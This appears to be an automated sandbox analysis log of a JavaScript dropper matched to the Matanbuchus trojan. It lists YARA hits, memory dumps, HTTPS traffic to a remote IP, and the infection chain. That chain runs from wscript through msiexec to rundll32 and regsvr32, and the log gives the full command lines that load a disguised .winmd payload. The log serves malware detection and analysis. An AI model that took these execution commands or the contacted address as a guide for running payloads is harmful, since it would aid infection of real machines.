                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.5:49830 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                  Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4D8A.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA2D.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC41.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICC71.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICCA1.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICD0F.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSICA2D.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6C33D8605_2_6C33D860
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB29D205_2_7FB29D20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB098305_2_7FB09830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2F8305_2_7FB2F830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB137405_2_7FB13740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3CDA95_2_7FB3CDA9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB343905_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB05_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB41EE05_2_7FB41EE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB59D9E5_2_7FB59D9E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD405_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC05_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB4D91B5_2_7FB4D91B
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB5160D5_2_7FB5160D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB4D5B65_2_7FB4D5B6
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB4D2285_2_7FB4D228
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB54EFE5_2_7FB54EFE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB4CEE05_2_7FB4CEE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3AAF05_2_7FB3AAF0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A8005_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB5C6405_2_7FB5C640
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB484905_2_7FB48490
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB464ED5_2_7FB464ED
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB29D205_2_7FB29D20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C1605_2_7FB1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6B6251C07_2_6B6251C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8137407_2_7F813740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB07_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F841EE07_2_7F841EE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F829D207_2_7F829D20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A8007_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82F8307_2_7F82F830
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C1607_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13374011_2_7F133740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB011_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F161EE011_2_7F161EE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F149D2011_2_7F149D20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A80011_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14F83011_2_7F14F830
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C16011_2_7F13C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7FB4F35D appears 144 times
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7FB413A0 appears 42 times
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7F84F35D appears 128 times
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7F16F35D appears 132 times
                  Source: Doc_21-04-53.jsInitial sample: Strings found which are bigger than 50
                  Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7f100000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 11.2.regsvr32.exe.7f100000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 7.2.regsvr32.exe.7f7e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 5.2.rundll32.exe.7fae0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 7.2.regsvr32.exe.7f7e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 5.2.rundll32.exe.7fae0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000007.00000002.2414164418.0000000005753000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000005.00000002.3322423322.0000000004D33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000007.00000002.2414511831.000000007F7E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2937064236.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                  Source: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                  Source: classification engineClassification label: mal96.troj.evad.winJS@14/21@3/2
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLCD39.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8f08
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF9DB77AF3876EB429.TMPJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DC
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                  Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A3003A09105FCE67A0C91E88C1FC90DCJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_initJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_initJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\724536\724536.winmd" "C:\Users\user\8f08\724536\724536.winmd"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
